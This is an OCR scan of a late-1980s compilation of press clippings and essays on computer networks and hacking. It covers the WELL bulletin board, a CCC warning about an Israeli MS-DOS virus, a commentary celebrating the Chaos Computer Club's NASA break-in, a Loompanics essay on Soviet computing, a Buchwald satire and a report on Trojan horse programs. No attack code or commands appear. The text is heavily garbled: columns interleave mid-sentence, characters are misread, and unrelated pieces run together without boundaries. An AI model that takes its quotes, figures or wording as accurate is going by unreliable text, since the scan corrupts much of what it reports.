coui^ses" offered by the Institute,
as well as to shdre research infor-
mat on wlth each other.
"tjiltlmately, this technology will
not Just be used as buslness tech-
wärking Institute, a Consulting
film in Waltham, Mass., recalls
"< ttendlng" a computerized New
Y :ar’s Eve party several years
a(o[ that Involved hundreds of
members of the electronic ex-
cl a'nge from all over the world
sending "Happy New Year" to
each other via the Computer.
In the San Francisco area, 1,700
people pay JStjBenttFsrpd-SJ an
hour to usewELL (the^^hole
Earth TectiUtiJJnkJr'arsubscrlp-
tion-based teledommunicatlons
System started last year by Stew¬
art Brand, originator of the Whole
Earth Catalogues. WELL sets up
Separate electronic bulletin boards
for groups of subscri^rs that
Share specific Interests.’
So far, according to Cllfford Fi-
gallo, who Is In Charge of Systems
operatlons for WELL, bulletin
boards on some 120 toplcs hdve
been set up. One of the most popu¬
lär Involves the GratefuI Dead
rock group. Some 250 members of
the System communicate regu-
larly to each other through iheir
electronic bulletin board to share
gosslp tidbits about the group, or
even to offer extra tickefts. to thp
group’9 next show.
Other populär elect^dnlc net-
iworks Ihave sprung upl around
toplcs sbch as the humatfmlnd and
true confesslons, the lattpr involv-
Ihg members relatihg ebents that
have shaped their llves..
"People think of comrnunicating
by Computer as dull and llihuman,”
said Mr. Flgallo. "But a| the Soft¬
ware and leleconferencing equip-
ment get more sophlstli ited and
Ihe hardware becomes pheapfer,
Systems like these are gc hg to oe-
come much more popule {. People
will realize that you can Ise.cohi-
puters to reacjh out a(jd;..louch
someone." ' . ■
nology, bul will become as com¬
mon to the,public as the tele-
phone," said Murray Turoff, the
head öf the New Jersey Institute,
’ which, Is In Newark.
HIS| net Work already has devel-
oped social aspects. Jessica Llp-
naclc, a consultant wlth the Net-
Aus Hamburg Ute Scheub
■Was zunächst nach einem ver¬
späteten Aprilscherz klang, ist
nach 'Versicherung des Hambur¬
ger „Chaos Computer Clubs“
(CCC) durchaus ernst zu neh¬
men. Dessen Zentralorgan ’Da-
tcnschleudcr* zufolge wird
heute, Freitag, den 13. Mai, ein
aus dem Nahen Osten einge¬
schmuggelter Computervirus
alle für ihn erreichbaren Daten¬
bestände zerstören, wenn sich
die Betreiber nicht mit einem so¬
genannten „Serum“ schützen.
Nach Berichten der Jerusale¬
mer Tageszeitung ’Maariv* und
der 'New York Times' breitet
sich das bösartige Virus in Israel
und über die internationale Da¬
tenvernetzung auch in den USA
auf Rechnern aus, die mit dem
weitverbreiteten Betriebssy-
stemMS-DOS gefahren werden.
Computerviren sind soge¬
nannte Programmroutinen, die
von Hackern in fremde Compu¬
ter eingeschleust werden, sich
dort unkontrolliert vermehren
und andere Daten „auffressen“.
NVie in der Genteehr.ologie meh-
rcnsich nach Auskunft des Chef¬
redakteurs der ’ Dalcnschlcuder'
auch in der Computertechnolo¬
gie „Freilandversuche“: Einmal
ins Netz ausgesetzt, kann sich
das Virus schnell international
verbreiten.
Nicht nur der CCC vermutet,
dall es sich bei der „ Virusvcrscu-
chung“ um einen politisch moti¬
vierten Sabotageakt aus Anlall
des 40. Jahrestags der Staats¬
gründung Israels handeln
könnte. Dort ist inzwischen ein
„Serum“ entwickelt worden,
mitdem die Virusroutinc geortet
und ausgeschaltet werden kann.
In einem Telex an verschie¬
dene Bundesministcrien hat der
CCC empfohlen, in Anlehnung
an Israel Präventionsmaßnah¬
men einzuleiten. Diejenigen,de¬
nen das nicht mehr gelingt, soll¬
ten am 13. Mai den Betrieb von
MS-DOS-Rcchnern mit mögli¬
cherweise lebenswichtigen Auf¬
gaben (z.B. in Krankenhäusern)
vermeiden.
D;
I er spektakuläre Coup des „Chaos Computer Clubs“
^löst klammheimliche Freude aus; Wie da den Tech¬
nokraten, Daten-Bankiers und High-Tech-Priestem ins Allerhei¬
ligste gepinkelt wurde, ist ketzerisch, rotzfrech und subversiv.
Daß die Hamburger Hacker dem Großen Bruder als nützliche
Idioten dienen und helfen, die Schwachstellen im System zu be¬
seitigen — dieses Argument zieht nur auf den ersten Blick. Natür¬
lich wird die Computer-Firma den Zugang, den die Hacker dieses
Mal gefunden haben, nun hochsicher versperren. Aber niemand
glaubt, daß dann die Daten ein für allemal gesichert wären.
J m Gegenteil; Jeder der vom heimischen Terminal und
/ Telefon verübten Einbrüche in die Zentren der Macht
beweist, daß es prinzipiell unmöglich ist, sie zu verhindern.
Kommunikations-Netze funktionieren nur als offene Systeme,
absolut gegen Mißbrauch abgescliottet ist auch eine Datenbank
för den Gebrauch nicht besser geeignet als ein Aktenschrank
mit Karteikarten.
I eicht vorstellbar ist das Chaos, das der Hacker-Club
Lm nicht umsonst im Namen führt, wenn derartige Spa¬
ziergänge durch den angeblich undurchsichtigen Datenwald sich
rhizomartig als neuer Volkssport ausbreiten und für allgemeinen
Durchblick (Glasnost!) im Daten-Dschungel des militärisch-in¬
dustriellen Komplexes sorgen. Die gläserne NASA beweist; Es
gibt keine Geheimnisse mehr, Orwells Großer Bruder ist ein
Schweizer Käse. Mathias Brö ckers
BQUIET
CQKlPUTEn
TEChl^fDEOGV
A Sumjnary
by Michael E. Marotta
aus: Loompanics Catalog 88
The USSR spends billions of dollars
importing technology from the West.
According to the CIA they go through
independent agents. They pay with letters
of credit deposited with the agent s
bank.'
"The USSR spends bil¬
lions of dollars import¬
ing technology from the
West"
They want technology that can be app¬
lied to military efforts. They also buy
"dual purpose" items. For instance, a
device to lest integrated circuits is a tool
that can be used for military projects,
even though it is not inherently a wea-
pons System, ln addition to equipment
and materials, they also acquire docu-
ments. Many have come from the Ub
Department of Commerce which operates
the National Technical Information
Service.^
The USSR is quite possibly ahead of the
USA in designs and theories. They lag m
applications and engineering.^ This is
because their society is based on stealing
from the able to provide for the needy.
This means that smart people go in for
those things that cannot be expropriated.
Chess masters keep their assets in their
heads.
It is easy for the USSR to keep vp with
the West by acquiring current technology.
The Reds cannot easily "leapfrog" the
West. They cannot develop NEW technol-
ogy 4 This is because they lag behind
America in personal Computers.
The KGB is actively recruiting Ameri-
cans to give (or seil) them Information
about Computer design. They supposedly
have 300 people in Moscow who evalu-
ate this information.= What they do with
this information is not easy to figure out.
Obviously, they do not produce personal
Computers.
Yevgeny P. Velikhov is in Charge of
trying to make the USSR Computer liter-
ate. He knows the score full well. He
admits that the Soviets are "five to seven
years behind the West."® ln fad, he owns
an IBM-PC.'' Velikhov is a top scientist
with direct access to the highest Soviet
ofTicials. If he owns an IBM-PC, you can
bet that there is no equivalent machine
produced in the USSR.
Some kinds of personal computing
devices are made in the USSR. They cost
about $500 to $750.®,« These Computers
are about like American varieties from
the early 1980s. They have random
access memories (RAM) of 32 kilobytes.
They plug into a TV set.'“
"Even if tbe USSR catches
BP instantly to where we
are right now, today, they
will fall behind by »nnrise
tomorrow. American*
invont now tools cvcry
day."
ln all, the Soviets have produced per-
haps more than 50,000 personal Compu¬
ters.“ In America, there are about 25
million homes with cornpumrs.'® There
are many reasons for this and chief
among them is thal America is still prim-
arily a trade oriented nation. Very few
Computers are actually made in America.
We Import Chips, disk drives, monitors,
and so on. But the USSR jealously guards
its hard currency. They are very cautious
about buying 4,000 PC
Yamaha of )apan.“ Buymg 10,000 IBM
PCs could take forever.“
Even if they avoid buying from the
West, the USSR will continue to Import
much from its satellites. Disk drives are
made in East Germany, Hungary and
Bulgaria.'=The USSR has an abysmal
record for manufacturing Computers.
Consider the story of the Agat Computer.
Dr. Leo Bores of Scottsdale, Arizona, is
a surgeon who specializes in myopia. He
uses methods developed in the USSR and
has strong ties with colleagues there. He
evaluated the Soviet "Agat" Computer for
Byte magazine.’«
The Agat was an Apple 11 clone. Instead
of a single board, it used several chip
modules. The Agat used CyrilUc letters.
However, these characters were created
with the Apple Tool Kit. When Dr. Bores
first "boot strapped" the Agat, it ran with
the Russian alphabet. But when he res-
tarted the machine, it came up with a
garbled American character set.''^
"The KGB is actively re-
crniting Americans to
give (or seil) them infor.
mation abont Computer
design."
The ROM (read only memory) still had
Steve Wozniak's name in mentory '*
(Steve Wozniak, with Steve Jobs, founded
the Apple Computer Corporation. Woz¬
niak wrote the System Software.)
Eventually, the Computer was discon-
tinued. One reason offered was that the
Reds ran out of parts.'« It is also likelv
that the $17,000 price tag helped sink
the marketing effort.®«,®'
This was not the first time the Reds
have copied Western technology. The ES-
1055, made in East Germany, is a clnnori
IBM 370. The IBM 370 was introdured
over 15 years ago. The ES-105 5 is the
usual choice for Soviet factorV
managers.«® ^
The Soviets have also huilt copigg j
the Digital Equipment Corporation pnp
11. Like the Agal/Apple, this is a do^-
grade of the equipment we kno«,
America. (The PDP-11 was replaegn w
the DEC VAX line 10 years ago.) The Pnp
11 was controlled by the LSI- n j
grated Circuit "Computer on a Chip."
Since the Soviets cannot produce a large
scale integrated Chip, they implemented
the LSI-11 as a set of Chips on a board.^^
"The USSR has an abys-
mal record for manufac-
turing Computers."
When the USSR Chose to clone the Intel
8080 microprocessor and its support
Chips, they even kept the model numbers.
The 8080 is called the K580IK80; the
Intel 8224 clock driver is the Soviel
K580IK24; the 8259 Interrupt Controller
is called a K5801K59 in the USSR.2+ It is
important to bear in mind that even in
1984, this Chip set was not populär in
America. Microcomputer manufacturers
were already using the faster Intel 8088
and 8086 Chips.
The Intel 8080 Computers and the
PDP-11 ran from disk drives. The Soviel
versions used paper tape.^^ Paper tape
went out for American Professionals in
1974. Hobbyists stopped using it hefore
1980.
If technology existed in a vacuum, the
Soviets might.actually he able to harness
Computer power for themselves. The fact
is that to have technology you have to
have freedom. Take away freedom and
technology falls.
Some Soviel factory managers do not
want Computers because this makes it
hard to faisify figures.^® The error here is
the Same as the assertion that the Nazi
State was "elTicient." Centralized States
have their own internal contradictions.
You must fear those above you. You must
deceive. Errors made at the top level
affect the whole country. The fact is that
the USSR cannot make effective use of
Computers.
"Yevgeny P. Velikhov is
in Charge of trying to
ntake the USSR Computer
literate. He knows the
score full well. He
admits that the Soviets
are Tive to seven years
behind the West.'"
The USSR fears their Underground. The
dissidents in the USSR duplicate essays
by hand; they type carbon copies. With
personal Computers and dot matrix Prin¬
ters at their disposal, the Underground
would really give the Soviel State some-
thing to worry about. This has already
happened in Poland.^r
Yet, the USSR is caught between a rock
and a hard place. If they deny their people
access to Computers, they maintain con-
trol and lose technology. If they go for
Computer literacy, they risk a rampant
spread of new ideas via a technology
which invariably outstrips attempts to
control it. The Reds may believe that they
can.have high technology and keep their
centralized state. This is doubtful.^B^ss^ao
There is a long-term trend toward
global communication. Historically, Rus-
sia has had only brief periods of Wester-
nization, They even maintain railroads
1
ART BUCHWALD
The Gorhachev Network
W ASHINGTON — The U.S.
has just inslalled a new hol
line to the Soviel Union lo prevent
accidental war. Instead of phones,
the System uses desk Computers.
That’s the rub. Anyone who has
ever watched someone using a Com¬
puter al an airline counter, a hotel
rcgislralion desk or a dcpartmeni
Store has lo be vcry ncrvous. Com¬
puters and the pcoplc who use
Ihem never seem
to be working
togethcr al the
same time.
This is my
nightmare:
“I want to
^eak to Mr.
Qorbachev on
the hot line.”
“Just a min-
ute, sir. I don’t _ ,
Show any Mr. Buchwald
Gorbachev on my screen. Do you
have a first name?”
"Mikhail Gorbachev. Hurry up,
the survival of ihe whole human
race depends on your networking
Gorbacnev in the Kremlin.”
“Do you know his Social Securi¬
ty number?"
“No, but if you don’t connect me
in the nexl ihree minutes your body
will tum inlo a glass of heavy wa¬
ter.”
“Let me try bypassing the Com¬
puter by way of Armenia. Hold it,
I’ra flashing a telephone number
fcf Maxim Gorky. Will he do?”
“1 want M. Gorbachev and no
onc but M. Gorbachev.”
“Sir, the hot-linc terminal on the
olhcr cnd says it is sold out at the
Bolshoi Ballet, but is willing to
trade two house scats for a pair of
tickcls to ‘Tlic Phunloni of ihc Op-
MIND
CONTROL
l.\
TUt
UNITED
STATES
“Teil your Computer to try Gor¬
bachev at his dacna.”
“We have no access to his dacha,
but Ijpn get you an airline seal on
Aeroflüt to Raleigh, North Caroli¬
na.”
“Your Computer was supposcd
to be programmed to immediately
put me in touch with tlic Icadcr cf
the Communisi world. How do you
explain this foul-up?”
‘T don’t know, sir. We talked to
someone in the Soviel Union the
olher day.”
□
“Whal did you say?”
“We confirraed he had a double
room al the Holiday Inn in Atlantic
City.”
“The clock is running. Is there no
way of jumping the program so I
can get ihrough directly to the Po¬
litbüro?"
‘T'll tty this. ril retrieve all the
Gorbachevs in the Moscow tele¬
phone book and then sorl them out
m my memory bank.”
“Did it Work?”
“No, the only thing the Computer
says is^a Mrs. Gorbachev owcs
Bloomingdale’s $12.50.”
□
“Where did you leam to run a
Computer, young man?”
“National Airport. The ma-
chines there are much easier to
work than this one, sir. 1 could get a
Russian on my Deila Airlines res-
ervalions screen any time 1 wanted
10 .”
“Hurry, man, someone has
goofed and World War III is upon
US.”
"Do you want me to feed that
into the Computer?”
“Why not?”
“Uh, oh — soincthing has gone
wrong because it says we transmit-
ted a faulty enlry on a rental car in
Lincoln, Nebraska.”
“Forget it, TU call Gorbachev on
the phonc,”
“You don’l have lo — he is on
the phone.”
“Why didn’l you teil me?”
"I thoughi you wanted to speak
to him on the Computer.”
“Mikhail, I’m glad to talk to you.
I don’t want you to get mad, but
tomorrow morning you are going
lo be receiving 100 million Read-
er’s Digests in the mail. Just send
them back lo us and we’ll pay the
poslage. . . . No, Mikhail, these
aren’t the same operators who will
be running Star Wars. The Star
Wars programmers are being
trained by Easlem Airlines.”
h. l- efV
I
with track gauge different frotn other
countries to ensure their isolalion. How-
ever, this is the age of television, not
railroads.
People in East Europe receive Western
television. The USSR now produces some
\-ideo tape cameras and players.^' When
Computers and television merge the
results can only be called "radical."
Joel Schatz has a project called Ark. He
makes it possible for people from the
USA and the USSR to communicate via
slow Scan television and Computer. Ele¬
ments in both governments fear him.
Americans cannot be allowed to discover
that most people in Russia like living
there. The people in the USSR cannot be
allowed to learn that most Americans live
like kings.3^
"In all, the Soviets have
produced perhaps more
than 50,000 personal
Computers."
Schatz suffered a series of bureau-
cratic hassles. He had to run interference
for himself dealing with the governments
of the USA, USSR, Britain, and Turkey. He
triumphed. On New Year's Eve 1985/
1986 he finally got his linkup to work.
This was the first effort of what Schatz
likes to call "Two Track Diplomacy."
Scientists from the USSR and USA dis-
cussed peaceful uses of outer space and
celebrated the 25th anniversary of the
laser.’^
The next stage is for teens from the
Soviel Union and America to use slow
Scan television and Computers to discuss
alcoholism.^* Bear in mind that olTicials
from the US and their clones in the USSR
put up obstacles. Schatz just works that
much harder.
This "two track diplomacy" also can be
found on the PeaceNet Computer bulletin
board You can access PeaceNet via Tel-
enet (a long-distance packet “rrier that
you dial locally). PeaceNet (Host 408346)
serves dozens of leftwing and alternative
social actiori groups. The Central Am®*'*"
can Resource Network, the Beyond War
Foundation, and others, give Americans
access to people that the American
goverhment has built a "Berlin Wall
around.
The USA, NATO and Japan have decided
not to export high-tech devices like the
IBM-PC/XT and PC/AT to the USSR. How-
ever, it is legal to export 8-bit Computers
like the TRS-80, VlC-20, Apple II or "plain
vanilla" IBM PC.^= This, despite the fact
that the Apple II can be modified to
control missile firing.^ß Of course, this
"modification" is easy to accomplish.
"The Computer revolu-
tion in America came
from droponts, weirdos
and nerds. Until the
USSR can tolerate Ihese
people, they will never
captnre the power of the
Computer."
There are at least a million people in
America who could program an Apple 11
to run a coordinate output device. There
are so many Systems analysts in America
that estimates from seven sources ränge
from 370,000 to 2.9 million. And there
are still those 25 million home
Computers.
Consider that the 8-bit Computers like
the Apple II are now obsolete in America.
You can buy a Tl-99 or VIC-20 for bar-
gain basement prices. Today's home
Computers (Macintosh, Atari ST, Amiga,
etc.) are all 16-bit machines. They are not
available to the USSR. Yet, the H-bit
machines will serve Soviel young people
quite well. If the USSR wants a Computer
literate society, they should buy all the
outdated 8-bit machines in America.
"Catching up to the West" is relative. It
is quite true that the USSR as a nation
cannot meet the Standards common in
America as a nation. However, it is a
grave error to assume that the USSR has
no hackers.^'^,^®,^® First of all, the modifi-
cations made to the Apple to produce the
Agal were done by somebody in the USSR.
Even if they have "very few" Computers,
they Still have ihousands upon thousands
of Computers. Ifyou have Computers, you
have Computer nerds: hackers.
Soviel hackers are called "Sinclairists”
(alter the machines built by the British
industrialist, Clive Sinclair). The Timex
Sinclair was sold in America around
1980. It ran on just four Chips and
weighed less than half a kilogram. There
are other Sinclair Computers, mostly sold
in the Old World.
'Tf technology existed in
a vaeuum, the Soviets
migtat actually be able to
harness Computer power
for themselves. The fact
is that to have technol.
ogy you have to have
freedom."
You can bet Ihat there are talented
young Soviets who spend their time writ-
ing their own programs. These hackers
have üttle opporiunity for the kind ol
"hooliganism" that plagues the USA. In
America, you can gain unauthorized
access to a Computer because we have
the world's best telephone System. In the
U.S. Computer Vandak Leam to Program Havoc
. . . • «irtiviiv wilhin htc nertOTtal harlfs who write Troian«; are «imnlv meart.
By Mark MeCain
Ycrk Times Service
NEW YORK — A new breed of vandals, working wdthin
the vasl nelwork of U.S. compuler "bulletin boards," are
devising sopbislicaled Software programs ihal erase and
scramble the Computer files of unsuspecling users.
The practice is stirring mislrusl and arger among business
executives, academics and hobbyisls who cxchangc free
compuler Software on the bulletin boards.
Tbc vandals, using telephone links from their Computers,
are transferring the destruclive programs onto the bulletin
boards. hoping to fool Ihousands of people into duplicatmg
the programs to use in their own Computers ai great barm.
"It's like poisoning the candy in the supcrmarkcl on
Halloween," said Ross M. Greenberg, a Manhattan Comput¬
er Consultant. "I guess the people who devise these ihings
takc pleasufe in destroying other people’s work."
The programs began appearing several years ago and now
have reached a level of sophistication that allows ihem to
sometimes oullox Computer experts who are on guard lor
Kjiown as Trojan horses, or more famibarly as Trojans^
Ihe programs pretend to be something uscful, like Word
Processor or game board. But they are eleclroiuc teiionsts,
ready to erase or scramble data stored m Computers.
Ainong the doeens of Trojans in circulation, some bepn
their deslruction wilhin minules. Others perform as legili-
matc Software for weeks or momhs. then louch off an
electronic time bomb.
"A person may lose live minutes of work —or lwo years
nl work said Mr. Greenberg. who mainiains several "tools
o( defense" againsl Trojans, includmg a Software piogram
that alerls him to suspicious activiiy within his personal
^’LSte'huudreds of other Computer enthusiasts across the
country Mr. Greenberg operales a Computer buUetm board
as a pub'Uc Service. Each sysop, shorthand for System opera-
tor the board operators are caUed, keeps a Computer
hoöked up to a telephone linc 24 hours a day, providing a
'Over a year of work could be
destroyed. If you’re using ihe
Computer for business, how do
you explaiu that sorl of thing to
your boss?’
—• Eric ISewhouMe, a compuler expert
Clearing house for hundreds of free "pubUc domain" soft-
* P^pKnnecl their Computers in» buU^ boar^
via Xhonc-bookup devices called
nale programs and make copies of programs already pos
on the boards. u . , th,
. The Trojan Software represents anolher ebapter in th
exploits of the Computer hackers. who Invest countless hours
in compuierized subterfuge. . ,
••There are hacksoul there who tcally amuse people with
iheir Cleverness." said Dave Bayer, an asstslanl Professor 0
maihcmatics at Columbia University in New York. Bul the
hacks wbo write Trojans are simply nican-spirij^
malicious. There’s no skill invoWed in trashing pcopl^'j
disks."
A hard disk, the primary storage unit of advanced Derson*
al Computers, can hold the equivalcnt of 400 to
of sin^c-spaced lypcwrillen data. Like tape casseii^
disks can ^ erased, inlentionally or not. ’
The Trojans work by giving Ihe Computer inteniaj instnio
lions, bul whiie preiending to perform somc
Function the instructions amount lo elecironic suicid^ c
Trojans only scramble or erase the “file allocalion tablc^Jhe
computcr’s indes of where data are slored on a hard d'* i- k
user can often still retrievc the data, although with
Bul others, aflor erasing the tablc, procced to instni h
Computer lo do a “low-lcvel formal,” or erasure. of •
disk ‘beeniue
‘•Conceivably, upwards of over a year of woiV could be
deslroyed," said Kc Newhouse, an 18-year-ol<l cq-, “,
experl in Los Angeles, ••!! you're using the «>mput.S. i?,
business, how do you explain that sort of thius
boss?
your
Users are adjusting to compuler lerrorism by iuerM ■
Security. Most bulletin board operators are be^tln^*®*
check the Identity of people who call up their boar^"t 'j
they are testing suspicious programs. ■
But even if a Trojan perpetralot were idcmifie.j ■,
uncertain whether any state or federal laws provid»*(
proscculing that person. ™
'•After you’vc been bit once," said Charles E. R» i
Manhattan Computer user. “you look al every ^ *
program with a skeptical eye. But every once in a wb:».
of ihem still sneaks by." ’
J
USSR, the phone lines can't support data
grade communication.‘‘° They slopped
using direct dial long-distance calling in
1982. The KGB found it hard to monitor
such phone calls.“^'
But this is a two-way Street. American
hackers who access a wide variety of
Computers learn to deal with many kinds
of Software. They develop sawy that car
hardly be transcribed any more than yor
can learn to swim by reading a hook.
They also learn a lot about Computer
Security. As they assume positions in
business and government, they transfer
this arcane knowledge to their new
responsibilities.
Even if the USSR catches up instantly to
where we are right now, today, they will
fall behind by sunrise tomorrow. Ameri-
cans invent new tools every day.
Take Run Length Limited. It's a way to
Store 30 megabytes on a 20 megabyte
disk drive. New a year ago, it is common
today.
'''With personal Compu¬
ters and dot matrix Prin¬
ters at their disposal, the
nndergronnd wonld
really give the Soviet
State something to worry
about. This has already
happened in Poland."
"Goal-Seeker" is an add-on that works
with several common spreadsheets. You
put in the figures you want to have for the
result and the program juggles the
spreadsheet to make the numbers come
out right. (Just what every Soviet factory
manager needs!) This program is a
“Shareware“ product created by a
hacker; it is available for less than $10.
There are over 800 such Software pack-
ages for IBM PC-type machines.
Hundreds more exist for Apple, Commo-
dore and most other Computers.
In about two years the 514 inch
diskette will be as old-fashioned as the 8
inch diskette is today. The 3.5 inch
diskette is coming. There are portable
Computers that will use 2.5 inch
diskettes. Two years from now, the
Soviets will still be trying to get 1.2
megabytes on a 5*4 inch diskette (Stand¬
ard with the IBM-PC/AT). We will be
putting twice that much on a floppy half
that size.
Non-von is short for non-von Neumann
(after Dr. John von Neumann who, in the
late 1940s, outlined digital Computer
principles). Instead of being one-
instruction-at-a-time processors, they
are parallel devices. These new Compu¬
ters process several instructions at the
same time. Biochips are on the horizon.
Based on living materials, these Chips can
be used for non-von Computers and to
run prosthetic devices.“^
When Dr. Bores investigated the Agat,
he used Locksmith 5.0, a program to
copy protected disks.'^^ Locksmith is now
available for the IBM-PC. Locksmith also
has dozens of competitors. There are
similar programs for other Computers,
such as Kräcker Jack for the Commodore
64.
"People in East Enrope
receive Western televi-
sion. The USSR now pro-
duces some video tape
Cameras and players.
When Computers and tel-
e'vision merge the resnlts
can only be called 'radi-
caL'"
There's a program called "PIdD-i-" (Pro-
ductivity Plus). It lets you defme keys and
sets of keys for writing text. For instance,
you can program "asap" to give you the
phrase "as soon as possible." You can
defme "mom" to mean the three lines in
your mother's name, address, City, state
and zip. Using a routine like this, you can
type up to 150 words per minute.
And yet, for all of our prowess, there
are signs that the Computer revolution is
slowing down. The Intel 803 8 6 chip
(used in the IBM Personal System 2) has
bugs. Over 100,000 were installed that
wouldn't do 32-bit arithmetic.'’'* This
could be an indication of what happens
when entrepreneurs become corporate
directors. When "three men in a garage"
become a "publicly owned" Corporation,
something is bound to go wrong.
"The Computer is a tool
for personal freedom.
Like gold money, the
Computer cannot be
made to serve its
destroyers/'
About 15 years ago, two young compu-,
ter nerds in Britain developed a program-
ming language that is well suited to
defining facts and rules about compli-
cated Systems. It was ignored in America
until 198 5 when Japan's Ministry of
Industry announced that the Prolog lan¬
guage from Clocksin and Mellish would
be part of their "Fifth Generation" effort.
"This nnderscores one of
several deficiencies in
Soviet Computer policy.
They identify with our
imperialist institutions."
Fortunafely, America is not saddled
with a centralized economy. Now we have
several versions of Prolog on the market
including one for about $100 (Borland's
"Turbo Prolog") and a "public domain"
Prolog for $10.
This article has mentioned the Intel
processor family several times. Actually,
hardcore hackers consider the Intel Chips
"brain-damaged" (even when they work
right). "Real programmers" use Motorola
68000-based machines like the Atari ST,
Commodore Amiga and Apple Macintosh.
This underscores one of several defi-
ciencies in Soviet Computer policy. They
identify with our imperialist institutions.
They want to emulate IBM. But the com-
Television
and Radio
A 1966 Cartoon
by Jenscn
—“Sunday Telegraph,"
London.
OUß UEyT PßOaßAMME-
ALIU IN WONOESLANP-
la Nor aoiTAQLE
FOB-CMlLDßE.H.
-ty-
OUÜ NEyrPPOGßAMWE-
mren WITH mother —
li smrAGLE. ONi.y'.
Fora. aEueoTic aduLts
UjITH PAeaNT-FllrATIONS.
B O" PCOGCAMMeTT
POLITICAL '
NOT
£. poa.
ISTS .
OUO NOtT P«O6,0ANMe
IS A FBAmC. DlSCuSilON
OF TME. FOufi-UTTEA.
woßp OkiR ^OOETV.I
11 IS NOT SuirASLE ‘
FOR CONTEMPOO^/
^PKamatists.
oun Final PEOGHANNe,
THE ePlCOqUE.
IS 5UITA0LE ONLT
FOE athGisU of
TWELvE And overa.
rMÖo WOM'T foECiCT
TO SujircH OFF
yooE. scrs.wiLu
•ifC» crriLDkEN !
puter revolution did not come from IBM.
The Computer revolution in America
came from dropouts, weirdos and nerds.
Until the USSR can tolerate these people,
they will never capture the power of the
Computer.
This is one lesson the Reds will never
allow themselves to learn — even Amer¬
ica hasn't learned it. The Computer revo¬
lution came abouf because there are no
government regulations on computing.
AlsrV'ONE can be a program mer, simply by
claiming to be one. Kids too young to be
legally employed have earned hefty
incomes from writing Software. Several
of the most profitable "Adventure"
games were created by a housewife wdth
two babies.
"If the USSR wants a
Computer literate Soc¬
iety, they should buy all
the outdated 8-bit ma-
chines in America."
These kinds of graphics oriented
games led to cheap CAD (Computer aided
design) drafting Systems. The USSR man-
aged to Slip 40 Tektronix Workstations
out of West Germany.'*®
Meanwhile, you can buy powerful CAD
Software for any home Computer for less
Ihan S100. (PC Sig has a four-disk set for
$24.)
The Soviet Union's efforts to acquire
Western Technology usually support
military goals. Yet the USSR has failed to
utilize the greatest military weapon in
America: the videogame. The Reds may
have a few of the "Battle Zone" tank
game. We have thousands being used
everyday by would-be armor soldiers.
Millions of American kids have played
"Star Wars" and "Mach II." Of course,
military applications are just the tip of
the iceberg.
In a World where Information is wealth,
the Soviet Union is poor. America has
thousands of Computer bulletin board
Services. The BBS fever has even infected
our own government. You can linkup
with the Department of Commerce's
microcomputer support group at (301)
948-5718. The private databases (Com¬
puServe, Dialog, Nexis, etc.) lower above
the government's and are themselves
eclipsed by the thousands of hobbyist
bulletin Boards. Typical of these is the
John Galt Line, at (305) 235-1645.
The Soviet Union can never catch up to
America in Computer technology. If they
dismantled their state, they might
achieve the technological prowess of
Brazil by the year 2000. The Computer is
a tool for personal freedom. Like gold
money, the Computer cannot be made to
serve its destroyers.
BIBUOGRAPHIC NOTES
This article was made possible by database
searches on the InfoTrac and CLSI public library
Systems and also IQuest from the Computer
Information Service (CompuServe) of Columbus.
Ohio, wbich ofcourse would have been impossi-
bie in the USSR. Also, the Central Intelligence
Agency was kind enough to honor a Freedom of
Information Act request within 30 days. The
Soviet Embassy Press Attache took several
months Io suggest that I shop at any of three
recommended bookstores.
t. Soviet Acquisition of MiUtarily Signiflcant
Western Technology: an Update, Central Intel¬
ligence Agency, 1985.
2. Ibid.
3. Electronics Research and Technology in the
USSR, Emmanuel Piore, Central Intelligence
Agency, 197G.
4. Op. eit.
5. Ibid., (cf ref 23, this Tigure is quoted as 400
to 500).
6. "Computer Gamesman," loyce Barnathan,
AfeivsivfieA', Nov. 18, 1985.
7. Ibid.
8. "Soviets Launch Computer Literacy Drive,"
Constance Holden, Science, Jan. 10, 1988.
9. "Computer Gamesman."
10. Op. cit.
11. Ibid.
12. "Moscow Faces the New Age," Mark Whi-
taker, et al., Newsweek, Aug. 18, 1986.
13. "Soviets Launch Computer Literacy Drive."
14. "U.S. Computers May Enroll in Moscow U,"
Mark D'Anaslasio, et al., Business Week, Feb
4, 1985.
15. Op. cit.
16. "Agat: A Soviel Apple II Computer," Dr. Leo D.
Bores, ByTe, Nov. 1984.
17. Ibid.
18. "The State of Computer Technology in the
Soviel Union," Durk Pe'arson, transcribed'
remarks from The Future of Freedom rnnfer
ence,Nov. 1986. » uoiuer
19. "Soviets Launch Computer Literacy Drive"
20. Op. cit.
21. "Agat: A Soviet Apple II Computer,"
22. "The Great Soviet Computer Screw-up'
Daniel Seligman, Fortune, july 8, 1985
23. "Soviet Microprocessors and Microcomnu-
ters," Ruth Heuertz, Byte, Apr. 1984 ^
24. Ibid.
25. Ibid
26. Op. cit.
27. "Moscow Faces the New Age." ,
28. Ibid \
29. 'The Great Soviet Computer Screw-up "
30. "Soviets Launch Computer Literacy Drive" '
31. "Moscow Faces the New Age." I
32. "Slow Scan to Moscow," Adam Horh«rhiM
Mother Jones, lune, 19 8 6. cnsctuld
33. Ibid
34. Ibid
35. "War by Microcomputer," Time Tut« nn
1984. ' y i
36. Ibid
37. "Computer Gamesman."
38. 'The State of Computer Technolotrv in thf
Soviet Union."
39. "Soviets Launch Computer Literacy Drive"
40. Ibid
41. "Moscow Faces the New Age."
42. Advanced Computers: Parallel and Binrhis
Processors, Norman W. Lord, et al.. Arm Arbor
Science, 1985. j
43. "Agat: A Soviel Apple 11 Computer." |
44. "Intel's Chips have huss,"Fortune, June 8
1987.
45. "How those Computers got to Moscow" Frc
deric A Miller, et al., Business lYeeA- n'n, ot
1986. □ -uct. 20
Minus Delta talks
Auszüge aus einem Brainstorming 15.3.1988
m: Mike (Minus Delta t)
e: Eva (Frau an Bord)
p: Poetronic (Dichter)
m: Was ich nicht sehen will in dieser Hackerei:
Irgendwelche Romantik-Geschichten, die
kompetente Leute - wozu ich auch Wau zähle,
und die ich einfach phantastisch finde von
Technik und Motorik - da abziehen.
: Der Chaos Computer Club - so wie ich die
eutchen kenne -, das ist die inhomogenste
Versammlung von Menschen, die mir jemals
begegnet ist. Wobei der Computer dabei zu
sowas wie einem sozialen Katalysator wird. Ein
Katalysator ist ja eigentlich ein Stoff, der sich
selber nicht verändert, aber verändernd wirkt.
Du stellst einen Computer hin, und davor findet
sich einträchtig eine Schar von Menschen zu¬
sammen, die, würden sie sich in einer Kneipe
treffen, sich nie im Leben anquatschen würden
oder gemeinsam an einen Tisch setzen. Aus
allen ideologischen Bereichen. Da findest du
den Althippie mit Sandale und Karotte im linken
